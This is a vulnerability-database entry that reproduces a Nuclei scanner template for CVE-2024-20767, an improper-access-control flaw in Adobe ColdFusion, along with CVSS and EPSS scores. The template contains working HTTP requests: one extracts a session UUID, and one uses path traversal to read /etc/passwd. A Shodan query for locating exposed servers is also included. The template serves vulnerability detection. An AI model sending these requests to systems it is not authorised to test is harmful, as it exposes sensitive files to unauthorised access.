Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-20767
HistoryMar 26, 2024 - 4:03 a.m.

Adobe ColdFusion - Arbitrary File Read

2024-03-2604:03:06
ProjectDiscovery
github.com
18
coldfusion
arbitrary
file read
improper access control
vulnerability
adobe
exploitation
security measures
unauthorized access
sensitive files
bypass
cve2024
lfr

8.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

8.3 High

AI Score

Confidence

High

0.082 Low

EPSS

Percentile

94.4%

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
id: CVE-2024-20767

info:
  name: Adobe ColdFusion - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
  reference:
    - https://jeva.cc/2973.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20767
    - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
    - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
    - https://github.com/Hatcat123/my_stars
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-20767
    cwe-id: CWE-284
    epss-score: 0.08221
    epss-percentile: 0.94345
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"Adobe ColdFusion"
  tags: cve,cve2024,adobe,condfusion,lfr

http:
  - raw:
      - |
        GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
        Host: {{Hostname}}
        uuid: {{extracted_uuid}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'wddxPacket')"
          - "contains(header_2, 'application/json')"
          - "contains(body_2, '/bin/bash')"
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: extracted_uuid
        group: 1
        regex:
          - "<var name='uuid'><string>(.*)</string>"
        internal: true
# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950

8.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

8.3 High

AI Score

Confidence

High

0.082 Low

EPSS

Percentile

94.4%